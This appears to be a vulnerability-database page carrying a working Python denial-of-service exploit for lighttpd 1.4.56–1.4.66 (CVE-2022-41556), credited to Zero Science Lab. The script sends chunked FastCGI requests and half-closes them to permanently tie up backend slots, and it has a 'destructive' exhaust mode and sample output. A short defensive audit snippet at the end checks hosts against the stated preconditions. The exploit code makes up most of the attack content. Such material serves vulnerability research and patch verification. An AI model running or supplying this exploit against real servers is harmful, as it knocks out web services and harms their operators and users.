Lighttpd 1.4.56 - 1.4.66 Resource Leak Denial of Service PoC

23 Jan 2026 | Reported by Gjoko Krstic | Type: zeroscience | www.zeroscience.mk

Lighttpd versions 1.4.56 to 1.4.66 have a resource exhaustion DoS via gateway backends with chunked requests.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2022-41556 | 6 Oct 2022 18:17 | attackerkb
AlpineLinux | CVE-2022-41556 | 6 Oct 2022 00:00 | alpinelinux
Circl | CVE-2022-41556 | 6 Oct 2022 22:22 | circl
CNNVD | lighttpd security vulnerability | 28 Sep 2022 00:00 | cnnvd
CVE | CVE-2022-41556 | 6 Oct 2022 00:00 | cve
Cvelist | CVE-2022-41556 | 6 Oct 2022 00:00 | cvelist
Debian | [SECURITY] [DSA 5243-1] lighttpd security update | 28 Sep 2022 16:05 | debian
Debian CVE | CVE-2022-41556 | 6 Oct 2022 00:00 | debiancve
Tenable Nessus | Debian DSA-5243-1 : lighttpd - security update | 29 Sep 2022 00:00 | nessus
Tenable Nessus | Fedora 35 : lighttpd (2022-c26b19568d) | 23 Dec 2022 00:00 | nessus

Code

#!/usr/bin/env python3
#
#
# Lighttpd 1.4.56 - 1.4.66 Resource Leak Denial of Service PoC
#
#
# Vendor: Glenn Strauss
# Product web page: https://www.lighttpd.net
# Affected version: 1.4.56 - 1.4.66
# Fixed version: 1.4.67-1.fc35
#
# Summary: lighttpd (pronounced /lighty/) is a secure, fast,
# compliant, and very flexible web server that has been optimized
# for high-performance environments. lighttpd uses memory and
# CPU efficiently and has lower resource use than other popular
# web servers. Its advanced feature-set (FastCGI, CGI, Auth,
# Output-Compression, URL-Rewriting and much more) make lighttpd
# the perfect web server for all systems, small and large.
#
# Desc: CVE-2022-41556 is a resource exhaustion vulnerability
# in lighttpd 1.4.56 - 1.4.66 affecting gateway backends such
# as FastCGI. When handling an HTTP/1.1 request with chunked
# transfer encoding and request-body streaming enabled, lighttpd
# mishandles an anomalous client disconnect (RDHUP / half-closed
# TCP connection) before the terminating chunk is sent. In this
# state, the gateway handler can incorrectly return HANDLER_WAIT_FOR_EVENT
# without transitioning to an error or cleanup path, leaving the
# backend connection slot permanently allocated. By repeatedly
# opening such malformed connections, an attacker can exhaust
# available backend slots, causing new dynamic requests to hang
# indefinitely and resulting in a denial of service that persists
# until the server is restarted.
#
# ---------------------------------------------------------------
# ./lightslot.py --port 88 -n 5 --delay 0.1 10.0.0.7 --fcgi-path /bus.php --exhaust
#
# o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
# | | | | | | | | | | | | | | | | | | |
#  lighttpd FastCGI backend slot leak
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
#
# [+] Detected Server: lighttpd/1.4.64
# [*] Target: http://10.0.0.7:88/bus.php
# [+] [0] anomalous FastCGI request sent
# [+] [1] anomalous FastCGI request sent
# [+] [2] anomalous FastCGI request sent
# [+] [3] anomalous FastCGI request sent
# [+] [4] anomalous FastCGI request sent
# [*] Injection phase complete
# [*] Starting frontend probe
# [PROBE] frontend response time: 5.062s
# [PROBE] frontend response time: 17.047s
# [*] Cleanup complete
# [*] Test complete
# ---------------------------------------------------------------
#
# Tested on: lighttpd 1.4.64
#
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#                  @zeroscience
#
#
# Advisory ID: ZSL-2026-5968
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5968.php
# CVE ID: CVE-2022-41556
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2022-41556
# Fix release changelog: https://www.lighttpd.net/2022/9/17/1.4.67/
# Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=2130967
#
#
# 23.01.2026
#

import threading
import argparse
import socket
import time
import sys

banerche = """
o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | |
 lighttpd FastCGI backend slot leak
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
"""


class FastCGILeakTester:
    def __init__(self, host, port, fcgi_path,
                 conns, delay, detect_only):
        self.detect_only = detect_only
        self.fcgi_path = fcgi_path
        self.conns = conns
        self.delay = delay
        self.running = True
        self.sockets = []
        self.host = host
        self.port = port

    def make_socket(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((self.host, self.port))
        return s

    def chunky_funk(self, cid):
        # Chunked request that is half-closed before the terminating
        # chunk, i.e. the anomalous disconnect described in the header.
        try:
            s = self.make_socket()
            req = (
                f"POST {self.fcgi_path} HTTP/1.1\r\n"
                f"Host: {self.host}\r\n"
                f"Transfer-Encoding: chunked\r\n"
                f"Connection: keep-alive\r\n"
                f"\r\n"
            ).encode()
            s.sendall(req)
            s.sendall(b"4\r\ntest\r\n")
            s.shutdown(socket.SHUT_WR)
            self.sockets.append(s)
            print(f"[+] [{cid}] anomalous FastCGI request sent")
        except Exception as e:
            print(f"[-] [{cid}] failed: {e}")

    def run(self):
        print(f"[*] Target: http://{self.host}:{self.port}{self.fcgi_path}")
        print(f"[*] Mode: {'DETECT' if self.detect_only else 'EXHAUST'}")
        for i in range(self.conns):
            if not self.running:
                break
            t = threading.Thread(
                target=self.chunky_funk,
                args=(i,),
                daemon=True
            )
            t.start()
            time.sleep(self.delay)
        print("[*] Injection phase complete")

    def frontend_probe(self):
        # Time a plain request every 3 seconds to observe the effect
        # on the frontend.
        print("[*] Starting frontend probe")
        while self.running:
            try:
                s = self.make_socket()
                start = time.time()
                s.sendall(b"GET / HTTP/1.0\r\n\r\n")
                s.recv(64)
                elapsed = time.time() - start
                s.close()
                print(f"[PROBE] frontend response time: {elapsed:.3f}s")
            except Exception as e:
                print(f"[PROBE] frontend failure: {e}")
            time.sleep(3)

    def cleanup(self):
        self.running = False
        for s in self.sockets:
            try:
                s.close()
            except OSError:
                pass
        print("[*] Cleanup complete")


def check_lighty(host, port):
    # Banner check: continue only if the Server header names lighttpd.
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        s.connect((host, port))
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        resp = s.recv(512)
        s.close()
        for line in resp.split(b"\n"):
            if b"Server:" in line and b"lighttpd" in line.lower():
                print(f"[+] Detected {line.decode().strip()}")
                return True
        print("[-] lighttpd not detected")
        return False
    except Exception as e:
        print(f"[-] connection failed: {e}")
        return False


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("host")
    parser.add_argument("--port", type=int, default=80)
    parser.add_argument("--fcgi-path", default="/index.php",
                        help="Must be FastCGI-backed")
    parser.add_argument("-n", "--conns", type=int, default=5,
                        help="Use small number for detection")
    parser.add_argument("--delay", type=float, default=0.2)
    parser.add_argument("--exhaust", action="store_true",
                        help="Exhaust backend slots (DESTRUCTIVE)")
    args = parser.parse_args()
    print(banerche)
    if not check_lighty(args.host, args.port):
        sys.exit(1)
    tester = FastCGILeakTester(
        args.host,
        args.port,
        args.fcgi_path,
        args.conns,
        args.delay,
        detect_only=not args.exhaust
    )
    try:
        tester.run()
        probe = threading.Thread(
            target=tester.frontend_probe,
            daemon=True
        )
        probe.start()
        time.sleep(30)
    except KeyboardInterrupt:
        pass
    finally:
        tester.cleanup()
    print("[*] Test complete")


if __name__ == "__main__":
    main()
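
As an added defensive example (not part of the original PoC or of lighttpd), the audit below classifies a host from its version banner and configuration text against the preconditions named in the description: affected version range, a gateway module, and request-body streaming. The directive name `server.stream-request-body`, the module list and the sample configuration are assumptions that do not appear on the page.

```python
import re

# Affected range as stated in the advisory header above.
AFFECTED_MIN, AFFECTED_MAX = (1, 4, 56), (1, 4, 66)
# Assumption: illustrative, non-exhaustive set of gateway modules.
GATEWAY_MODULES = {"mod_fastcgi", "mod_scgi", "mod_proxy"}

# Constructed sample configuration (not taken from the page).
SAMPLE_CONF = '''
server.modules = ( "mod_access", "mod_fastcgi" )
server.stream-request-body = 1   # stream request body to the backend
fastcgi.server = ( ".php" => (( "socket" => "/run/php.sock" )) )
'''

def parse_version(banner):
    """Return (major, minor, patch) from e.g. 'Server: lighttpd/1.4.64', else None."""
    m = re.search(r"lighttpd/(\d+)\.(\d+)\.(\d+)", banner, re.IGNORECASE)
    return tuple(int(p) for p in m.groups()) if m else None

def audit(banner, conf_text):
    """Classify a host from its version banner and lighttpd.conf text."""
    version = parse_version(banner)
    # Naive comment stripping: assumes '#' never appears inside a quoted value.
    body = "\n".join(line.split("#", 1)[0] for line in conf_text.splitlines())
    gateways = sorted(set(re.findall(r'"(mod_\w+)"', body)) & GATEWAY_MODULES)
    values = re.findall(r"server\.stream-request-body\s*=\s*(\d+)", body)
    streaming = any(int(v) != 0 for v in values)  # 0 buffers the whole body
    if version is None:
        verdict = "unknown-version"      # banner hidden or not lighttpd
    elif not (AFFECTED_MIN <= version <= AFFECTED_MAX):
        verdict = "not-affected"
    elif gateways and streaming:
        verdict = "exposed"              # all three preconditions present
    else:
        verdict = "affected-version"     # still upgrade to the fixed release
    return {"version": version, "gateways": gateways,
            "streaming": streaming, "verdict": verdict}

if __name__ == "__main__":
    for banner in ("Server: lighttpd/1.4.64", "Server: lighttpd/1.4.67"):
        print(banner, "->", audit(banner, SAMPLE_CONF))
```

A banner version does not reflect distribution backports such as the Debian DSA-5243-1 update listed under Related, so confirm the installed package version before trusting an "exposed" or "affected-version" verdict.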

Vulners AI Score: 7 (High risk)
CVSS 3.1: 7.5
EPSS: 0.01808